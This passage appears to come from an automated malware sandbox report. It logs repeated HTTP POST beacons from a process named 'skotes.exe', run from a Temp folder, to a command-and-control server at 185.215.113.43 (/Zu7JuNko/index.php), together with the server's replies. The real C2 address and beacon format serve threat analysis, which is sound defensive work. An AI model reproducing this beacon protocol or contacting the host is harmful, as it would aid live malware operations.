                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:23.796700954 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:23 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    42192.168.2.550124185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:42.346173048 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:43.727556944 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:43 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:31.731450081 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:33.115369081 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:32 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    43192.168.2.550126185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:45.468086958 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:46.844578028 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:46 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:37.819191933 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:39.242203951 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:39 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    44192.168.2.550135185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:48.494431019 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:49.838747025 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:49 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    45192.168.2.550153185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:51.583614111 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.963824034 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:52 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:48.194555044 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:49.587250948 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:49 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    46192.168.2.550165185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:54.603485107 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:55.938561916 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:55 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:21.962166071 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:23.306157112 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:23 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    47192.168.2.550178185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:57.694581985 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:59.083745003 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:58 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:55.803772926 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:57.232568979 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:57 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    48192.168.2.550181185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:00.709355116 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:02.101237059 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:01 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:01.946501017 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:03.384702921 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:20:03 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    49192.168.2.550186185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:03.849797964 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:05.236306906 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:05 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:17.499715090 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:20:18.943212986 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:20:18 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    50192.168.2.550188185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:06.866672039 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:08.249428988 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:08 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
